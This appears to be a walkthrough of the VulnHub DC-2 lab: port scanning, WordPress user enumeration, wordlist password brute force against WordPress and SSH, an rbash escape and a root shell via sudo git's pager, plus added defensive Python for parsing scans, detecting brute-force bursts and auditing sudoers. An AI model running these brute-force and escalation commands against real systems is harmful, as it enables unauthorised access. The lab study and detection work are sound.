# DC-2

## VulnHub DC-2 pentest

## Collect information

```
root@kali:~/Desktop# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.26.114.94 netmask 255.255.240.0 broadcast 172.26.127.255
inet6 fe80::a00:27ff:fe5c:6526 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:5c:65:26 txqueuelen 1000 (Ethernet)
RX packets 4226 bytes 539314 (526.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 41604 bytes 2529267 (2.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 2088 bytes 90758 (88.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2088 bytes 90758 (88.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

root@kali:~/Desktop# nmap -sS 172.26.112.0/20 -p 80 --open
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-14 00:13 EST

root@kali:~/Desktop# nmap -sS 172.26.112.0/20 -p 80 --open --oN DC-2.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-14 00:13 EST
Nmap scan report for DC-2.mshome.net (172.26.118.49)
Host is up (0.0014s latency).

PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:A0:92:5B (Oracle VirtualBox virtual NIC)

Nmap done: 4096 IP addresses (3 hosts up) scanned in 84.32 seconds
```

Port scan (all 65535 TCP ports):

```
root@kali:~# nmap -sS 172.26.118.49 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-14 03:08 EST
Nmap scan report for dc-2 (172.26.118.49)
Host is up (0.00050s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
80/tcp open http
7744/tcp open raqmon-pdu
MAC Address: 08:00:27:A0:92:5B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.10 seconds
```

Port 7744 is interesting, so run version and OS detection (-A) against both open ports:

```
root@kali:~# nmap -sS 172.26.118.49 -p 80,7744 -A
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-14 03:11 EST
Nmap scan report for dc-2 (172.26.118.49)
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 &#8211; Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:A0:92:5B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.06 ms dc-2 (172.26.118.49)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.91 seconds
```
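The scans above were saved with `--oN`, and the interesting finding (SSH on the non-standard port 7744) is the kind of thing a defender wants to pull out of such reports automatically for an asset inventory. As an added example, not part of the original writeup, here is a small Python parser for nmap's normal output format that extracts hosts and open services and flags well-known services running on unusual ports. The embedded report text is a constructed sample trimmed from the output above; the `USUAL_PORT` table is an assumption of this example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed sample: the normal-format (-oN) report nmap printed for the DC-2
# host above, trimmed to the lines this parser cares about.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-14 03:11 EST
Nmap scan report for dc-2 (172.26.118.49)
Host is up (0.0011s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 08:00:27:A0:92:5B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.91 seconds
"""

# "Nmap scan report for dc-2 (172.26.118.49)" or "Nmap scan report for 172.26.118.49"
HOST_RE = re.compile(r"^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[\d.]+)\))?$")
# "7744/tcp open  ssh     OpenSSH 6.7p1 ..." (the version column is optional)
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)

# Port a service name is normally found on (assumption of this example); an
# open service elsewhere, like ssh on 7744, is worth a second look.
USUAL_PORT = {"ssh": 22, "http": 80, "https": 443}


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


@dataclass
class Host:
    ip: str
    hostname: str
    services: List[Service] = field(default_factory=list)


def parse_nmap_normal(text: str) -> List[Host]:
    """Parse nmap -oN output into Host objects, one per 'scan report' block."""
    hosts: List[Host] = []
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            name, ip = m["name"], m["ip"]
            if ip is None:  # report line carried a bare IP and no hostname
                ip, name = name, ""
            current = Host(ip=ip, hostname=name)
            hosts.append(current)
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            current.services.append(Service(
                port=int(m["port"]), proto=m["proto"], state=m["state"],
                name=m["service"], version=(m["version"] or "").strip(),
            ))
    return hosts


def open_services(hosts: List[Host]) -> List[Tuple[str, int, str, str]]:
    """Flatten to (ip, port, service, version) rows for open ports only."""
    return [(h.ip, s.port, s.name, s.version)
            for h in hosts for s in h.services if s.state == "open"]


def nonstandard_ports(hosts: List[Host]) -> List[Tuple[str, int, str]]:
    """Open services sitting on a port other than their usual one."""
    return [(h.ip, s.port, s.name)
            for h in hosts for s in h.services
            if s.state == "open" and USUAL_PORT.get(s.name, s.port) != s.port]


if __name__ == "__main__":
    hosts = parse_nmap_normal(SAMPLE_NMAP_OUTPUT)
    for row in open_services(hosts):
        print(row)
    print("non-standard:", nonstandard_ports(hosts))
```

Feed it the file written by `--oN` instead of the sample and the same two functions give a first-pass inventory of exposed services and a short list of oddities to review.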

Add a hosts entry so the name dc-2 resolves to 172.26.118.49 (the later commands use http://dc-2/):

```
vi /etc/hosts
```

Visit the homepage.

### Directory brute force

```
dirb http://dc-2/

+ http://dc-2/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://dc-2/wp-admin/
==> DIRECTORY: http://dc-2/wp-content/
==> DIRECTORY: http://dc-2/wp-includes/
+ http://dc-2/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://dc-2/wp-admin/ ----
+ http://dc-2/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://dc-2/wp-admin/css/
==> DIRECTORY: http://dc-2/wp-admin/images/
==> DIRECTORY: http://dc-2/wp-admin/includes/
+ http://dc-2/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://dc-2/wp-admin/js/
==> DIRECTORY: http://dc-2/wp-admin/maint/
==> DIRECTORY: http://dc-2/wp-admin/network/
==> DIRECTORY: http://dc-2/wp-admin/user/

---- Entering directory: http://dc-2/wp-content/ ----
+ http://dc-2/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://dc-2/wp-content/languages/
==> DIRECTORY: http://dc-2/wp-content/plugins/
==> DIRECTORY: http://dc-2/wp-content/themes/

---- Entering directory: http://dc-2/wp-admin/network/ ----
+ http://dc-2/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://dc-2/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://dc-2/wp-admin/user/ ----
+ http://dc-2/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://dc-2/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://dc-2/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://dc-2/wp-content/plugins/ ----
+ http://dc-2/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://dc-2/wp-content/themes/ ----
+ http://dc-2/wp-content/themes/index.php (CODE:200|SIZE:0)
```

The CMS is obviously WordPress.

# Attack

## Found flag1

```
flag 1
Your usual wordlists probably won't work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can't win them all.

Log in as one to see the next flag.

If you can't find it, log in as another.
```

## flag2

The directory brute force found the admin backend at http://dc-2/wp-admin/network/admin.php.

wpscan is a good tool for scanning WordPress sites, so start scanning. Usage:

```
wpscan --url='http://dc-2' --api-token=<your token>
```

The vulnerabilities it reports are not easy to exploit, though.

Given flag1's hint, we should probably brute-force passwords. First, enumerate users:

```
wpscan --url="http://dc-2" -e u
```

Users found: admin / jerry / tom

flag1 hints at cewl. cewl is a custom word list generator: it crawls a site and builds a wordlist from the words found in its pages, which is why the usual wordlists would not work here.

```
cewl http://dc-2 -w password.dic
```

Then run the password attack with a user list (user.dic contains admin, jerry and tom) and the generated wordlist:

```
wpscan --url="http://dc-2" -U user.dic -P password.dic
```

```
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
```

So try logging in as jerry/tom.

jerry: got flag2

```
Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.
```

## flag3 & flag4

Getting a shell through WordPress is hard, and flag2 tells us to try another way, so brute-force SSH (which is on port 7744, not 22) with the same lists:

```
hydra -L user.dic -P password.dic ssh://172.26.118.49 -s 7744 -vV -o dc2.ssh
```

Result: username tom, password parturient.
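Both password attacks in this writeup, wpscan's XML-RPC attack against WordPress and hydra against SSH on 7744, leave the same kind of trace on the target: a burst of authentication attempts from one source address. As an added example that is not part of the original writeup, here is a Python detector that runs one sliding-window burst check over constructed Apache access-log lines and constructed sshd auth.log lines. The sample log lines, the 60-second window and the thresholds are assumptions of this example, not data captured from the box.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, Iterable, List, Tuple

EST = timezone(timedelta(hours=-5))


def _stamp(base: datetime, seconds: int, fmt: str) -> str:
    return (base + timedelta(seconds=seconds)).strftime(fmt)


def _constructed_access_log() -> str:
    """Apache combined-format lines (constructed): 25 XML-RPC POSTs from one
    source inside 25 s, plus normal traffic and one XML-RPC call from elsewhere."""
    base = datetime(2021, 1, 14, 3, 40, 0, tzinfo=EST)
    fmt = '{ip} - - [{ts}] "{req} HTTP/1.1" 200 370 "-" "Mozilla/5.0"'
    ts_fmt = "%d/%b/%Y:%H:%M:%S %z"
    lines = [fmt.format(ip="172.26.114.94", ts=_stamp(base, i, ts_fmt), req="POST /xmlrpc.php")
             for i in range(25)]
    lines.append(fmt.format(ip="10.0.0.7", ts=_stamp(base, 5, ts_fmt), req="GET /index.php"))
    lines.append(fmt.format(ip="10.0.0.7", ts=_stamp(base, 6, ts_fmt), req="POST /xmlrpc.php"))
    return "\n".join(lines)


def _constructed_auth_log() -> str:
    """sshd lines in auth.log syslog format (constructed): 12 failures from one
    source inside 22 s, one stray failure from another address."""
    base = datetime(2021, 1, 14, 3, 45, 0)
    ts_fmt = "%b %d %H:%M:%S"
    lines = [f"{_stamp(base, 2 * i, ts_fmt)} dc-2 sshd[1041]: Failed password for "
             f"{('tom', 'jerry', 'admin')[i % 3]} from 172.26.114.94 port {50000 + i} ssh2"
             for i in range(12)]
    lines.append(f"{_stamp(base, 3, ts_fmt)} dc-2 sshd[1042]: Failed password for "
                 "invalid user bob from 10.0.0.7 port 40001 ssh2")
    return "\n".join(lines)


ACCESS_LOG = _constructed_access_log()
AUTH_LOG = _constructed_auth_log()

ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                       r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
SSHD_RE = re.compile(r'^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
                     r'Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)')


def bursts(events: Iterable[Tuple[datetime, str]], window: timedelta, threshold: int) -> Dict[str, int]:
    """Per key, the peak number of events inside any `window`; keep keys at or above `threshold`."""
    times: Dict[str, List[datetime]] = defaultdict(list)
    for ts, key in events:
        times[key].append(ts)
    alerts: Dict[str, int] = {}
    for key, ts_list in times.items():
        ts_list.sort()
        start, peak = 0, 0
        for end, t in enumerate(ts_list):
            while t - ts_list[start] > window:  # slide the window's left edge
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts


def xmlrpc_attack_sources(access_log: str, window_seconds: int = 60, threshold: int = 20) -> Dict[str, int]:
    """Source IPs hammering xmlrpc.php with POSTs (wpscan's password attack goes through XML-RPC)."""
    events = []
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if m and m["method"] == "POST" and m["path"].split("?")[0] == "/xmlrpc.php":
            events.append((datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["ip"]))
    return bursts(events, timedelta(seconds=window_seconds), threshold)


def ssh_bruteforce_sources(auth_log: str, year: int, window_seconds: int = 60, threshold: int = 10) -> Dict[str, int]:
    """Source IPs with a burst of sshd 'Failed password' lines (syslog stamps carry no year, so pass it in)."""
    events = []
    for line in auth_log.splitlines():
        m = SSHD_RE.match(line)
        if m:
            events.append((datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"), m["ip"]))
    return bursts(events, timedelta(seconds=window_seconds), threshold)


if __name__ == "__main__":
    print("xmlrpc:", xmlrpc_attack_sources(ACCESS_LOG))
    print("ssh:", ssh_bruteforce_sources(AUTH_LOG, 2021))
```

Only the burst from 172.26.114.94 trips either detector; the single XML-RPC call and the lone SSH failure from 10.0.0.7 stay below threshold. Moving SSH to 7744 changed nothing here, since sshd logs the same lines whatever port it listens on.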

So:

```
ssh tom@172.26.118.49 -p 7744
```

cat is not allowed, so read the flag with less flag3.txt or vi flag3.txt. flag3.txt:

```
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
```

The shell we landed in is rbash (restricted bash).

```
ls /home/* -la
```

jerry/flag4.txt is readable.

```
less /home/jerry/flag4.txt
```

Got it!

```
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!
```

## The final flag

### rbash escape

```
BASH_CMDS[a]=/bin/sh;a

/bin/bash

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin
```

After this, bash is usable normally.

### Elevate privileges

```
sudo -l
```

tom is not allowed to run sudo, so log in as jerry:

```
su jerry
```

password: adipiscing

Got it!

```
sudo -l
```

jerry can run git with sudo, so try to escalate privileges via git (`git -p` forces a pager, and `!/bin/sh` from the pager drops into a root shell):

```
$sudo git -p help config

!/bin/sh
#whoami
#root
```
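The escalation above works because a sudo rule hands jerry a program that can hand control to a pager. From the defender's side the fix is to not grant sudo on such tools at all (wrap the one operation that is needed in a dedicated script instead), and to audit sudoers for the pattern. As an added example that is not part of the original writeup, here is a small Python audit of sudoers rules that flags NOPASSWD entries, entries granting ALL commands, and entries granting a binary from a "shell-capable" set. The sample sudoers content is constructed (the jerry line models the page's finding that jerry may run git as root; the other lines are made up), the `SHELL_CAPABLE` set is an assumption seeded only with git, and the parser ignores per-command tags and aliases for brevity.

```python
import os
import re
from typing import List, Tuple

# Constructed sample /etc/sudoers content (not copied from the DC-2 box).
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
jerry   ALL=(root) NOPASSWD: /usr/bin/git
tom     ALL=(root) /usr/bin/systemctl restart apache2
deploy  ALL=(ALL) NOPASSWD: ALL
"""

# Programs that hand control to a pager or editor and so should never be
# granted via sudo; git is the one this writeup demonstrates. Operators extend
# this set from their own policy (the set itself is an assumption here).
SHELL_CAPABLE = {"git"}

# user_or_group  host=(runas) TAG: cmd1, cmd2   (aliases and per-command tags not handled)
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

Finding = Tuple[str, str, str]  # (user_or_group, command, reason)


def audit_sudoers(text: str, shell_capable=SHELL_CAPABLE) -> List[Finding]:
    """Return one finding per (rule, command, reason); root's own rule is skipped."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m or m["who"] == "root":
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            binary = os.path.basename(cmd.split()[0])
            if "NOPASSWD" in tags:
                findings.append((m["who"], cmd, "nopasswd"))
            if cmd == "ALL":
                findings.append((m["who"], cmd, "all-commands"))
            elif binary in shell_capable:
                findings.append((m["who"], cmd, "shell-capable"))
    return findings


def risky_users(text: str) -> List[str]:
    """Sorted, de-duplicated list of principals with at least one finding."""
    return sorted({who for who, _, _ in audit_sudoers(text)})


if __name__ == "__main__":
    for who, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{reason:14} {who:8} {cmd}")
```

Run against a real `/etc/sudoers` (and the files under `/etc/sudoers.d/`) the output is a review list, not a verdict: the `tom` line passes because `systemctl restart apache2` is a fixed command, while the `jerry` line is flagged twice, once for NOPASSWD and once because git can reach a pager.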

```
cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.
```

### Thoughts

If there is no way to get a webshell, we may still find another way in. That is an important lesson for those of us studying pentesting.
